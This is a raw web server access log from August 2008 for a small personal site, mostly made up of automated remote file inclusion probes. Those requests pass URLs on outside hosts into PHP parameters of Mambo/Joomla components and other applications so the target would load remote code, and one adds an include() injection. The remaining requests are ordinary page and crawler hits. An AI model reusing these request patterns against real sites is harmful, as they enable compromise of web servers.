87.230.21.231 - - [22/Aug/2008:09:09:19 -0500] "GET /db.php?path_local=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 290 "-""libwww-perl/5.803"
72.1.16.230 - - [22/Aug/2008:09:09:35 -0500] "GET /logs//bemarket/postscript/postscript.php?p_mode=http://triangle-uiuc.org/ascmd.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.65"
72.1.16.230 - - [22/Aug/2008:09:09:35 -0500] "GET //bemarket/postscript/postscript.php?p_mode=http://triangle-uiuc.org/ascmd.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.65"
80.67.20.130 - - [22/Aug/2008:09:10:04 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 336 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
80.67.20.130 - - [22/Aug/2008:09:10:04 -0500] "GET //skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 309 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
118.129.166.13 - - [22/Aug/2008:09:10:17 -0500] "GET /logs/access_log.1208044800/admin/editor2/errors.php?error=http://www.confesercentilucca.it/modules/idr.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
118.129.166.13 - - [22/Aug/2008:09:10:17 -0500] "GET /logs/admin/editor2/errors.php?error=http://www.confesercentilucca.it/modules/idr.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
118.129.166.13 - - [22/Aug/2008:09:10:17 -0500] "GET /admin/editor2/errors.php?error=http://www.confesercentilucca.it/modules/idr.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
80.67.20.130 - - [22/Aug/2008:09:11:44 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 336 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
118.129.166.13 - - [22/Aug/2008:09:11:46 -0500] "GET /admin/editor2/errors.php?error=http://www.confesercentilucca.it/modules/idr.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
118.129.166.13 - - [22/Aug/2008:09:11:46 -0500] "GET /logs/admin/editor2/errors.php?error=http://www.confesercentilucca.it/modules/idr.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
118.129.166.13 - - [22/Aug/2008:09:11:46 -0500] "GET /logs/access_log.1208044800/admin/editor2/errors.php?error=http://www.confesercentilucca.it/modules/idr.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
87.101.4.49 - - [22/Aug/2008:09:12:33 -0500] "GET /logs/?sourcedir=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 200 96216 "-""libwww-perl/5.79"
87.101.4.49 - - [22/Aug/2008:09:12:33 -0500] "GET /?sourcedir=http://thepornhandbook.com/templates/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
87.230.21.231 - - [22/Aug/2008:09:13:15 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
87.230.21.231 - - [22/Aug/2008:09:13:16 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.felixtur.com.br/principal/cache/id.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
92.51.130.118 - - [22/Aug/2008:09:16:36 -0500] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 363 "-""libwww-perl/5.803"
92.51.130.118 - - [22/Aug/2008:09:16:37 -0500] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 358 "-""libwww-perl/5.803"
195.70.134.135 - - [22/Aug/2008:09:18:12 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://gotika.webpark.cz/anglicky/x_01_01.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:12 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:12 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:32 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:37 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:38 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:38 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:38 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:38 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:38 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:39 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:39 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:39 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:39 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:40 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:40 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:40 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:43 -0500] "GET /costume/thmb7.htm HTTP/1.1" 200 2819 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:44 -0500] "GET /costume/costume73%20copy.JPG HTTP/1.1" 200 17492 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:44 -0500] "GET /costume/costume74%20copy.JPG HTTP/1.1" 200 17534 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:44 -0500] "GET /costume/costume76%20copy.JPG HTTP/1.1" 200 16386 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:44 -0500] "GET /costume/costume75%20copy.JPG HTTP/1.1" 200 17209 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:44 -0500] "GET /costume/costume77%20copy.JPG HTTP/1.1" 200 16029 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:44 -0500] "GET /costume/costume78%20copy.JPG HTTP/1.1" 200 15860 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:45 -0500] "GET /costume/costume79%20copy.JPG HTTP/1.1" 200 19168 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:45 -0500] "GET /costume/costume81%20copy.JPG HTTP/1.1" 200 18119 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:45 -0500] "GET /costume/costume80.JPG HTTP/1.1" 200 67426 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:45 -0500] "GET /costume/costume82%20copy.JPG HTTP/1.1" 200 16328 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:45 -0500] "GET /costume/costume83%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
195.70.134.135 - - [22/Aug/2008:09:18:46 -0500] "GET /costume/costume84%20copy.JPG HTTP/1.1" 200 15105 "http://tomdolan.pconline.com/costume/thmb7.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
92.51.130.118 - - [22/Aug/2008:09:21:32 -0500] "GET /logs/access_log.1208044800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 353 "-""libwww-perl/5.803"
92.51.130.118 - - [22/Aug/2008:09:21:32 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
92.51.130.118 - - [22/Aug/2008:09:21:32 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
92.51.130.118 - - [22/Aug/2008:09:22:08 -0500] "GET /logs/access_log.1208044800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.tes2008.kit.net/id.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.803"
92.51.130.118 - - [22/Aug/2008:09:22:08 -0500] "GET /logs/access_log.1208044800//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.803"
92.51.130.118 - - [22/Aug/2008:09:22:08 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.tes2008.kit.net/id.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
92.51.130.118 - - [22/Aug/2008:09:22:08 -0500] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.803"
92.51.130.118 - - [22/Aug/2008:09:22:08 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
92.51.130.118 - - [22/Aug/2008:09:22:08 -0500] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.tes2008.kit.net/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
80.67.20.130 - - [22/Aug/2008:09:22:39 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
80.67.20.130 - - [22/Aug/2008:09:22:39 -0500] "GET //skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
80.67.20.130 - - [22/Aug/2008:09:22:41 -0500] "GET //skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
62.87.154.41 - - [22/Aug/2008:09:26:34 -0500] "GET /logs/!scanhttp://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
62.87.154.41 - - [22/Aug/2008:09:26:34 -0500] "GET /!scanhttp://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
74.6.8.121 - - [22/Aug/2008:09:27:52 -0500] "GET /memorial/index.htm HTTP/1.0" 200 817 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
190.137.181.149 - - [22/Aug/2008:09:28:36 -0500] "GET /logs/access_log.1205366400//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 372 "-""libwww-perl/5.805"
85.159.91.143 - - [22/Aug/2008:09:29:41 -0500] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
85.159.91.143 - - [22/Aug/2008:09:29:41 -0500] "GET //msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.elettrostudio.ch/fr/ids.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
190.137.181.149 - - [22/Aug/2008:09:30:43 -0500] "GET /logs/access_log.1206230400%20//skin/zero_vote/error.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
190.137.181.149 - - [22/Aug/2008:09:30:44 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
190.137.181.149 - - [22/Aug/2008:09:30:48 -0500] "GET //skin/zero_vote/error.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
87.226.77.5 - - [22/Aug/2008:09:30:52 -0500] "GET //modules/4nAlbum/public/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.812"
87.226.77.5 - - [22/Aug/2008:09:30:52 -0500] "GET /logs//modules/4nAlbum/public/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.812"
87.226.77.5 - - [22/Aug/2008:09:30:52 -0500] "GET /logs/access_log.1208044800//modules/4nAlbum/public/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 345 "-""libwww-perl/5.812"
87.226.77.5 - - [22/Aug/2008:09:31:12 -0500] "GET /logs/access_log.1206230400//modules/4nAlbum/public/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 345 "-""libwww-perl/5.812"
190.137.181.149 - - [22/Aug/2008:09:31:19 -0500] "GET /logs/access_log.1203638400%20//skin/zero_vote/error.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
71.168.122.164 - - [22/Aug/2008:09:32:28 -0500] "GET /robots.txt HTTP/1.0" 404 282 "http://majestic12.co.uk/bot.php?I=70E3BC8616D46ED5AFCCD86160E10970-FEB7CE4F8DFAAFF1-D383EC384A0ED19B-tomdolan.pconline.com""Mozilla/5.0 (compatible; MJ12bot/v1.2.2; http://www.majestic12.co.uk/bot.php?+)"
71.168.122.164 - - [22/Aug/2008:09:32:32 -0500] "GET /logs/access_log.1183420800 HTTP/1.1" 200 197762 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.2; http://www.majestic12.co.uk/bot.php?+)"
71.168.122.164 - - [22/Aug/2008:09:32:36 -0500] "GET /logs/access_log.1204070400 HTTP/1.1" 200 229376 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.2; http://www.majestic12.co.uk/bot.php?+)"
71.168.122.164 - - [22/Aug/2008:09:32:39 -0500] "GET /logs/access_log.1208304000 HTTP/1.1" 200 212686 "-""Mozilla/5.0 (compatible; MJ12bot/v1.2.2; http://www.majestic12.co.uk/bot.php?+)"
66.221.68.20 - - [22/Aug/2008:09:33:16 -0500] "GET /logs/index.php?DOCUMENT_ROOT=http://www.kx-td.com/images/bo.do??? HTTP/1.0" 404 286 "-""libwww-perl/5.53"
66.221.68.20 - - [22/Aug/2008:09:33:19 -0500] "GET /index.php?DOCUMENT_ROOT=http://www.kx-td.com/images/bo.do??? HTTP/1.0" 404 281 "-""libwww-perl/5.53"
87.226.77.5 - - [22/Aug/2008:09:34:28 -0500] "GET /logs/access_log.1205366400//modules/4nAlbum/public/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 345 "-""libwww-perl/5.812"
87.230.21.231 - - [22/Aug/2008:09:34:45 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
87.230.21.231 - - [22/Aug/2008:09:34:45 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
87.230.21.231 - - [22/Aug/2008:09:35:22 -0500] "GET //modules/4nAlbum/public/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
87.230.21.231 - - [22/Aug/2008:09:37:02 -0500] "GET //modules/4nAlbum/public/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
87.230.21.231 - - [22/Aug/2008:09:37:44 -0500] "GET //modules/4nAlbum/public/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
87.230.21.231 - - [22/Aug/2008:09:37:44 -0500] "GET /logs//modules/4nAlbum/public/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
87.230.21.231 - - [22/Aug/2008:09:38:26 -0500] "GET /logs//modules/4nAlbum/public/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
80.67.20.130 - - [22/Aug/2008:09:38:44 -0500] "GET /logs/access_log.1201564800//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 336 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
89.208.43.121 - - [22/Aug/2008:09:38:52 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://katsioulis.com/idd.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
62.87.154.41 - - [22/Aug/2008:09:40:52 -0500] "GET /!scanhttp://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
218.38.54.160 - - [22/Aug/2008:09:42:08 -0500] "GET /logs/access_log.1214524800//skin/zero_vote/error.php?dir=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
87.226.77.5 - - [22/Aug/2008:09:43:40 -0500] "GET //modules/4nAlbum/public/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.812"
87.226.77.5 - - [22/Aug/2008:09:44:59 -0500] "GET /logs//modules/4nAlbum/public/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.812"
87.226.77.5 - - [22/Aug/2008:09:44:59 -0500] "GET //modules/4nAlbum/public/errors.php?error=http://www.romevillage.com/id.txt?%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.812"
190.137.181.149 - - [22/Aug/2008:09:45:54 -0500] "GET /logs/access_log.1211500800//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 372 "-""libwww-perl/5.805"
89.218.85.18 - - [22/Aug/2008:09:45:54 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.218.85.18 - - [22/Aug/2008:09:45:57 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
66.221.68.20 - - [22/Aug/2008:09:45:58 -0500] "GET /logs/index.php?DOCUMENT_ROOT=http://www.kx-td.com/images/bo.do??? HTTP/1.0" 404 286 "-""libwww-perl/5.53"
66.221.68.20 - - [22/Aug/2008:09:45:58 -0500] "GET /index.php?DOCUMENT_ROOT=http://www.kx-td.com/images/bo.do??? HTTP/1.0" 404 281 "-""libwww-perl/5.53"
190.137.181.149 - - [22/Aug/2008:09:46:07 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/error.php?dir=http://juegos0nline.webcindario.com/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
74.52.99.98 - - [22/Aug/2008:09:47:52 -0500] "GET /logs///vwar/backup/errors.php?error=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.810"
74.52.99.98 - - [22/Aug/2008:09:47:52 -0500] "GET ///vwar/backup/errors.php?error=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.810"
74.52.99.98 - - [22/Aug/2008:09:47:52 -0500] "GET /logs/access_log.1206230400///vwar/backup/errors.php?error=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
74.52.99.98 - - [22/Aug/2008:09:47:58 -0500] "GET /logs/access_log.1208044800///vwar/backup/errors.php?error=http://clubmusic.caucasus.net/V7ID.txt?? HTTP/1.1" 404 335 "-""libwww-perl/5.810"
83.168.226.152 - - [22/Aug/2008:09:48:11 -0500] "GET /logs/access_log.1214524800//skin/zero_vote/error.php?dir=http://borneo.siteburg.com/splash.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
74.6.8.121 - - [22/Aug/2008:09:50:20 -0500] "GET /logs/access_log.1207526400 HTTP/1.0" 200 266384 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [22/Aug/2008:09:50:41 -0500] "GET /logs/access_log.1203292800 HTTP/1.0" 200 284149 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
221.139.104.33 - - [22/Aug/2008:09:50:53 -0500] "GET //include/write.php?dir=http://www.gelika.com.ua/c15e61196e3a06692913c0286b2a74eb/mc?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
221.139.104.33 - - [22/Aug/2008:09:51:16 -0500] "GET //include/write.php?dir=http://www.gelika.com.ua/c15e61196e3a06692913c0286b2a74eb/mc?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
221.139.104.33 - - [22/Aug/2008:09:51:19 -0500] "GET //include/write.php?dir=http://www.gelika.com.ua/c15e61196e3a06692913c0286b2a74eb/mc?? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
83.168.226.152 - - [22/Aug/2008:09:54:38 -0500] "GET /logs/access_log.1214438400//skin/zero_vote/error.php?dir=http://borneo.siteburg.com/splash.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
218.38.54.160 - - [22/Aug/2008:09:54:41 -0500] "GET /logs/access_log.1214438400//skin/zero_vote/error.php?dir=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
198.66.208.57 - - [22/Aug/2008:09:55:18 -0500] "GET /logs/access_log.1214438400/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.65"
198.66.208.57 - - [22/Aug/2008:09:55:18 -0500] "GET /plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.65"
198.66.208.57 - - [22/Aug/2008:09:55:18 -0500] "GET /logs/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
198.66.208.57 - - [22/Aug/2008:09:57:19 -0500] "GET /logs/access_log.1214524800/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 358 "-""libwww-perl/5.65"
198.66.208.57 - - [22/Aug/2008:09:57:19 -0500] "GET /sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
198.66.208.57 - - [22/Aug/2008:09:57:19 -0500] "GET /logs/sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.65"
198.66.208.57 - - [22/Aug/2008:09:58:50 -0500] "GET /logs/access_log.1214179200/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.65"
203.22.204.97 - - [22/Aug/2008:09:59:40 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.76"
